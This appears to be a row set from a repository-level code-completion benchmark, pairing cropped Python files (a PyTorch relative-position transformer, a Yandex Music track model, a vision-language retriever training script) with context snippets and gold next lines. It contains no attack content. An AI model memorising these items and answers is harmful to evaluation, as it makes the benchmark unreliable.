repo_name
stringlengths 7
71
| file_path
stringlengths 5
118
| context
list | import_statement
stringlengths 45
12.5k
| token_num
int64 641
99.4k
| cropped_code
stringlengths 44
17k
| all_code
stringlengths 43
754k
| next_line
stringlengths 2
330
| gold_snippet_index
int64 0
68
| created_at
stringlengths 25
25
| level
stringclasses 9
values |
---|---|---|---|---|---|---|---|---|---|---|
NOrangeeroli/SecondPose | model/pcd_cross/modules/transformer/lrpe_transformer.py | [
{
"identifier": "build_dropout_layer",
"path": "model/pcd_cross/modules/layers/factory.py",
"snippet": "def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module:\n r\"\"\"Factory function for dropout layer.\"\"\"\n if p is None or p == 0:\n return nn.Identity()\n else:\n return nn.Dropout(p=p, **kwargs)"
},
{
"identifier": "AttentionOutput",
"path": "model/pcd_cross/modules/transformer/output_layer.py",
"snippet": "class AttentionOutput(nn.Module):\n def __init__(self, d_model, dropout=None, activation_fn='ReLU'):\n super(AttentionOutput, self).__init__()\n self.expand = nn.Linear(d_model, d_model * 2)\n self.activation = build_act_layer(activation_fn)\n self.squeeze = nn.Linear(d_model * 2, d_model)\n self.dropout = build_dropout_layer(dropout)\n self.norm = nn.LayerNorm(d_model)\n\n def forward(self, input_states):\n hidden_states = self.expand(input_states)\n hidden_states = self.activation(hidden_states)\n hidden_states = self.squeeze(hidden_states)\n hidden_states = self.dropout(hidden_states)\n output_states = self.norm(input_states + hidden_states)\n return output_states"
},
{
"identifier": "LearnablePositionalEmbedding",
"path": "model/pcd_cross/modules/transformer/positional_embedding.py",
"snippet": "class LearnablePositionalEmbedding(nn.Module):\n def __init__(self, num_embeddings, embedding_dim, dropout=None):\n super(LearnablePositionalEmbedding, self).__init__()\n self.num_embeddings = num_embeddings\n self.embedding_dim = embedding_dim\n self.embeddings = nn.Embedding(num_embeddings, embedding_dim) # (L, D)\n self.norm = nn.LayerNorm(embedding_dim)\n self.dropout = build_dropout_layer(dropout)\n\n def forward(self, emb_indices):\n r\"\"\"Learnable Positional Embedding.\n\n `emb_indices` are truncated to fit the finite embedding space.\n\n Args:\n emb_indices: torch.LongTensor (*)\n\n Returns:\n embeddings: torch.Tensor (*, D)\n \"\"\"\n input_shape = emb_indices.shape\n emb_indices = emb_indices.view(-1)\n max_emd_indices = torch.full_like(emb_indices, self.num_embeddings - 1)\n emb_indices = torch.minimum(emb_indices, max_emd_indices)\n embeddings = self.embeddings(emb_indices) # (*, D)\n embeddings = self.norm(embeddings)\n embeddings = self.dropout(embeddings)\n embeddings = embeddings.view(*input_shape, self.embedding_dim)\n return embeddings"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from ..layers import build_dropout_layer
from .output_layer import AttentionOutput
from .positional_embedding import LearnablePositionalEmbedding | 1,841 | Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout)
| r"""Transformer with Learnable Relative Positional Embeddings.
Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout) | self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn) | 1 | 2023-12-16 16:58:33+00:00 | 4k |
KatantDev/YMdantic | ymdantic/models/tracks/track.py | [
{
"identifier": "DeprecatedMixin",
"path": "ymdantic/mixins.py",
"snippet": "class DeprecatedMixin:\n \"\"\"Миксин, удаляющий устаревшие поля из модели.\"\"\"\n\n @model_validator(mode=\"before\")\n def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Удаляет устаревшие поля из модели.\n\n :param obj: Словарь с данными модели.\n :return: Словарь с данными модели без устаревших полей.\n \"\"\"\n obj.pop(\"substituted\", None)\n obj.pop(\"deprecation\", None)\n obj.pop(\"decomposed\", None)\n if obj.get(\"version\") is not None:\n obj[\"title\"] += f\" ({obj.get('version')})\"\n obj.pop(\"version\")\n return obj"
},
{
"identifier": "Artist",
"path": "ymdantic/models/artists/artist.py",
"snippet": "class Artist(YMBaseModel, DeprecatedMixin):\n \"\"\"Pydantic модель, представляющая информацию об артисте.\"\"\"\n\n id: int\n # Уникальный идентификатор артиста.\n name: str\n # Имя артиста.\n various: bool\n # Флаг, указывающий, является ли артист группой.\n composer: bool\n # Флаг, указывающий, является ли артист композитором.\n genres: List[str]\n # Жанры треков артиста.\n disclaimers: List[Literal[\"\"]] # TODO: Проверить, что тут может быть.\n # Список отказов от ответственности артиста.\n cover: Optional[Cover] = None\n # Обложка артиста.\n\n @model_validator(mode=\"before\")\n def validate_genres(cls, artist: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Этот метод класса конвертирует жанры в данных об артисте в новый вид.\n\n Он проверяет, присутствует ли ключ 'genre' в словаре альбома. Если\n он присутствует, он присваивает список, содержащий жанр,\n ключу 'genres' словаря альбома. Если ключ 'genre' отсутствует,\n он присваивает пустой список ключу 'genres'.\n\n :param artist: Словарь, содержащий информацию об артисте.\n :return: Словарь, содержащий информацию об артисте с конвертированными\n жанрами.\n \"\"\"\n genre = artist.get(\"genre\")\n artist.pop(\"genre\", None)\n artist[\"genres\"] = [genre] if genre else []\n return artist\n\n def get_cover_image_url(self, size: str = \"200x200\") -> Optional[HttpUrl]:\n \"\"\"\n Возвращает URL изображения обложки артиста с заданным размером.\n\n :param size: Размер изображения.\n :return: URL изображения обложки артиста с заданным размером.\n \"\"\"\n if self.cover is None:\n return None\n return self.cover.get_image_url(size)"
},
{
"identifier": "YMBaseModel",
"path": "ymdantic/models/base.py",
"snippet": "class YMBaseModel(BaseModel, ClientMixin):\n \"\"\"Базовая Pydantic модель для всех будущих моделей.\"\"\"\n\n model_config = ConfigDict(\n alias_generator=to_camel,\n populate_by_name=True,\n extra=\"forbid\",\n )"
},
{
"identifier": "ChartPosition",
"path": "ymdantic/models/chart_position.py",
"snippet": "class ChartPosition(YMBaseModel):\n \"\"\"Pydantic модель, представляющая позицию трека в чарте.\"\"\"\n\n position: int\n # Позиция трека в чарте.\n progress: Literal[\"same\", \"up\", \"down\", \"new\"]\n # Информация о том, как изменилась позиция трека за последнее время.\n listeners: int\n # Количество слушателей трека на прошлой неделе.\n shift: int\n # Количество позиций, на которое изменилась позиция трека за последнее время.\n bg_color: Optional[str] = None\n # Цвет фона позиции трека."
},
{
"identifier": "R128",
"path": "ymdantic/models/tracks/r128.py",
"snippet": "class R128(YMBaseModel):\n \"\"\"\n Pydantic модель, представляющая данные нормализации громкости по стандарту EBU R128.\n\n Стандарт EBU R128 используется для измерения воспринимаемой громкости аудиоконтента.\n \"\"\"\n\n i: float\n # Значение интегрированной громкости в LUFS (единицы громкости\n # относительно полной шкалы). Это общая громкость всего аудиофрагмента.\n tp: float\n # Истинный пиковый уровень в dBTP (децибелы истинного пика).\n # Это самый высокий уровень в аудиоконтенте, учитывающий межсемпловые пики."
},
{
"identifier": "Fade",
"path": "ymdantic/models/tracks/fade.py",
"snippet": "class Fade(YMBaseModel):\n \"\"\"Pydantic модель, представляющая информацию о постепенном переходе в треке.\"\"\"\n\n in_start: float\n # Время в секундах, когда начинается постепенное увеличение громкости.\n in_stop: float\n # Время в секундах, когда заканчивается постепенное увеличение громкости.\n out_start: float\n # Время в секундах, когда начинается постепенное уменьшение громкости.\n out_stop: float\n # Время в секундах, когда заканчивается постепенное уменьшение громкости."
},
{
"identifier": "DerivedColors",
"path": "ymdantic/models/tracks/derived_colors.py",
"snippet": "class DerivedColors(YMBaseModel):\n \"\"\"Pydantic модель, представляющая производные цвета обложки альбома.\"\"\"\n\n average: str\n # Средний цвет обложки в формате HEX.\n wave_text: str\n # Цвет текста волновой формы в формате HEX.\n mini_player: str\n # Цвет мини-плеера в формате HEX.\n accent: str\n # Акцентный цвет в формате HEX."
},
{
"identifier": "TrackAlbum",
"path": "ymdantic/models/tracks/album.py",
"snippet": "class TrackAlbum(BaseAlbum):\n \"\"\"Pydantic модель, представляющая информацию об альбоме с текущим треком.\"\"\"\n\n start_date: Optional[date] = None\n # Дата начала альбома.\n track_position: Optional[TrackPosition] = None\n # Позиция трека в альбоме (если есть)."
},
{
"identifier": "LyricsInfo",
"path": "ymdantic/models/tracks/lyrics_info.py",
"snippet": "class LyricsInfo(YMBaseModel):\n \"\"\"\n Pydantic модель, представляющая информацию о наличии текста песни.\n\n Наличие текста и синхронизированных текстов песни.\n \"\"\"\n\n has_available_sync_lyrics: bool\n # Флаг, указывающий на наличие синхронизированных текстов песни.\n has_available_text_lyrics: bool\n # Флаг, указывающий на наличие текста песни."
},
{
"identifier": "Major",
"path": "ymdantic/models/tracks/major.py",
"snippet": "class Major(YMBaseModel):\n \"\"\"Pydantic модель, представляющая основную информацию о лейбле трека.\"\"\"\n\n id: int\n # Уникальный идентификатор лейбла.\n name: str\n # Название лейбла."
},
{
"identifier": "DownloadInfo",
"path": "ymdantic/models/tracks/download_info.py",
"snippet": "class DownloadInfo(YMBaseModel):\n \"\"\"Pydantic модель, представляющая информацию о скачивании трека.\"\"\"\n\n codec: CodecType\n # Кодек трека. Возможные значения: \"mp3\", \"aac\".\n gain: bool\n # Флаг для нормализации громкости трека (видимо).\n preview: bool\n # Доступно ли предварительное прослушивание трека.\n download_info_url: HttpUrl\n # Ссылка на S3-хранилище с данными для формирования ссылки на скачивание трека.\n direct: bool\n # Является ли ссылка на S3-хранилище прямой ссылкой на скачивание трека.\n bitrate_in_kbps: int\n # Битрейт трека в кбит/с."
},
{
"identifier": "DownloadInfoDirect",
"path": "ymdantic/models/tracks/download_info.py",
"snippet": "class DownloadInfoDirect(DownloadInfo):\n direct_url_info: S3FileUrl\n\n @property\n def direct_url(self) -> HttpUrl:\n \"\"\"\n Генерирует прямой URL для скачивания трека.\n\n Этот метод возвращает URL, сформированный на основе информации о прямом URL,\n хранящейся в атрибуте 'direct_url_info' экземпляра.\n\n :return: Прямой URL для скачивания трека.\n \"\"\"\n return self.direct_url_info.url"
}
] | from typing import List, Optional, Literal
from pydantic import HttpUrl
from ymdantic.mixins import DeprecatedMixin
from ymdantic.models.artists import Artist
from ymdantic.models.base import YMBaseModel
from ymdantic.models.chart_position import ChartPosition
from ymdantic.models.tracks.r128 import R128
from ymdantic.models.tracks.fade import Fade
from ymdantic.models.tracks.derived_colors import DerivedColors
from ymdantic.models.tracks.album import TrackAlbum
from ymdantic.models.tracks.lyrics_info import LyricsInfo
from ymdantic.models.tracks.major import Major
from ymdantic.models.tracks.download_info import DownloadInfo, DownloadInfoDirect | 3,249 |
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть)
|
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть) | r128: Optional[R128] = None | 4 | 2023-12-21 21:24:10+00:00 | 4k |
MMC-K/multimodal_understanding | training_retriever.py | [
{
"identifier": "DatasetForVLAlign",
"path": "data_utils.py",
"snippet": "class DatasetForVLAlign(Dataset):\n def __init__(\n self,\n file_path: str,\n image_tokenizer: ViTFeatureExtractor,\n text_tokenizer: AutoTokenizer,\n image_root_dir=None,\n text_max_length=512,\n ):\n super().__init__()\n self.file_path = file_path\n self.image_tokenizer = image_tokenizer\n self.text_tokenizer = text_tokenizer\n self.image_root_dir=image_root_dir\n self.text_max_length = text_max_length\n\n logger.info(\"loading dataset...\")\n self.data = json.load(open(file_path, \"r\"))\n logger.info(\"{} examples was loaded.\".format(len(self.data)))\n\n def __getitem__(self, index):\n sample = self.data[index]\n\n path = sample[\"path\"]\n if self.image_root_dir is not None:\n path = os.path.join(self.image_root_dir, path)\n \n description = sample[\"description\"]\n\n image = Image.open(path)\n\n image_feature = self.image_tokenizer(images=image, return_tensors=\"pt\")\n text_feature = self.text_tokenizer(description, return_tensors=\"pt\", truncation=True, max_length=self.text_max_length)\n\n return {\n \"pixel_values\": image_feature[\"pixel_values\"],\n \"input_ids\": text_feature[\"input_ids\"],\n \"attention_mask\": text_feature[\"attention_mask\"],\n }\n\n def __len__(self):\n return len(self.data)\n\n def get_collate_fn(self):\n def collate_fn(samples, pad_id=0):\n if len(samples) == 0:\n return {}\n return {\n \"input_ids\": collate_tokens([s[\"input_ids\"] for s in samples], pad_id),\n \"attention_mask\": collate_tokens([s[\"attention_mask\"] for s in samples], 0),\n \"pixel_values\": default_collate([s[\"pixel_values\"][0] for s in samples])\n }\n return functools.partial(collate_fn, pad_id=self.text_tokenizer.pad_token_id)"
},
{
"identifier": "VisionT5SimpleBiEncoder",
"path": "modeling_encoder.py",
"snippet": "class VisionT5SimpleBiEncoder(BiEncoderBase):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5SimpleBiEncoder, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderSimple.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderSimple.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5MeanBiEncoder",
"path": "modeling_encoder.py",
"snippet": "class VisionT5MeanBiEncoder(BiEncoderBase):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5MeanBiEncoder, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderMean.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderMean.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5SimpleBiEncoderHN",
"path": "modeling_encoder.py",
"snippet": "class VisionT5SimpleBiEncoderHN(BiEncoderBaseHN):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5SimpleBiEncoderHN, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderSimple.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderSimple.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5MeanBiEncoderHN",
"path": "modeling_encoder.py",
"snippet": "class VisionT5MeanBiEncoderHN(BiEncoderBaseHN):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5MeanBiEncoderHN, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderMean.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderMean.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
}
] | import argparse
import os
import gc
import time
import json
import shutil
import logging
import functools
import numpy as np
import torch
import torch.nn.functional as F
import torch.distributed as dist
import torch.utils.data
import torch.utils.data.distributed
import torch.nn.parallel
from tqdm import tqdm
from torch.utils.data import DataLoader
from torch.nn import CrossEntropyLoss
from torch import optim
from torch.nn.parallel import DistributedDataParallel as DDP
from transformers import AutoTokenizer, ViTFeatureExtractor
from torch.utils.tensorboard import SummaryWriter
from data_utils import DatasetForVLAlign
from modeling_encoder import (
VisionT5SimpleBiEncoder,
VisionT5MeanBiEncoder,
VisionT5SimpleBiEncoderHN,
VisionT5MeanBiEncoderHN,
) | 3,363 | batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
